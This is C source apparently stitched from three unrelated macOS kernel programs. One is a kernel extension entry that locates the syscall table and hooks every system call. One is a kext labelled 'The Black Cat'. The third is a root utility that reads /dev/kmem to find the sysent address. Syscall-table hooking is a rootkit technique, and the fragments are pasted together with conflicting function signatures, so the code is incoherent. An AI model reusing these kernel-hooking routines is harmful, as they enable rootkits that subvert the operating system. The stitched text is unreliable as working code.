kern_return_t grey_fox_start(kmod_info_t * ki, void *d)
{
LOG_INFO("Rawr, hi kernel!");
mach_vm_address_t kernel_base = 0;
if ((_sysent = find_sysent(&kernel_base)) == NULL) {
return KERN_FAILURE;
}
hook_all_syscalls(_sysent);
plug_kauth_listener();
return KERN_SUCCESS;
}
/*
* THE FUN STARTS HERE
*/
kern_return_t
onyx_the_black_cat_start (kmod_info_t * ki, void * d)
{
printf(
" _____ \n"
"| |___ _ _ _ _ \n"
"| | | | | |_'_| \n"
"|_____|_|_|_ |_,_| \n"
" |___| \n"
" The Black Cat v%s\n", VERSION);
// install the kernel control so we can enable/disable features
install_kern_control();
// locate sysent table
if (find_sysent() != KERN_SUCCESS)
{
return KERN_FAILURE;
}
if (init_kernel_info(&g_kernel_info) != KERN_SUCCESS)
{
return KERN_FAILURE;
}
// ALL DONE
return KERN_SUCCESS;
}
int
main(int argc, char ** argv)
{
header();
// we need to run this as root
if (getuid() != 0)
{
printf("[ERROR] Please run me as root!\n");
exit(1);
}
int8_t kernel_type = get_kernel_type();
if (kernel_type == -1)
{
printf("[ERROR] Unable to retrieve kernel type!\n");
exit(1);
}
if((fd_kmem = open("/dev/kmem",O_RDWR)) == -1)
{
fprintf(stderr,"[ERROR] Error while opening /dev/kmem. Is /dev/kmem enabled?\n");
fprintf(stderr,"Add parameter kmem=1 to /Library/Preferences/SystemConfiguration/com.apple.Boot.plist\n");
exit(1);
}
// retrieve int80 address
idt_t idt_address = get_addr_idt(kernel_type);
uint64_t int80_address = calculate_int80address(idt_address, kernel_type);
uint64_t kernel_base = find_kernel_base(int80_address, kernel_type);
if (kernel_base == 0)
{
fprintf(stderr, "[ERROR] Could not find kernel base address!\n");
exit(1);
}
uint64_t data_address = 0;
uint64_t data_size = 0;
process_header(kernel_base, &data_address, &data_size);
uint8_t *read = malloc((size_t)data_size);
if (read == NULL)
{
printf("[ERROR] Memory allocation failed!\n");
exit(1);
}
// read kernel memory and find sysent
readkmem(fd_kmem, read, data_address, (size_t)data_size);
uint64_t sysent_address = find_sysent(read, data_address, data_size);
if (sysent_address)
{
printf("[OK] Found sysent address at %p\n",(void*)sysent_address);
}
else
{
printf("[ERROR] Could not found sysent address!\n");
}
free(read);
return 0;
}
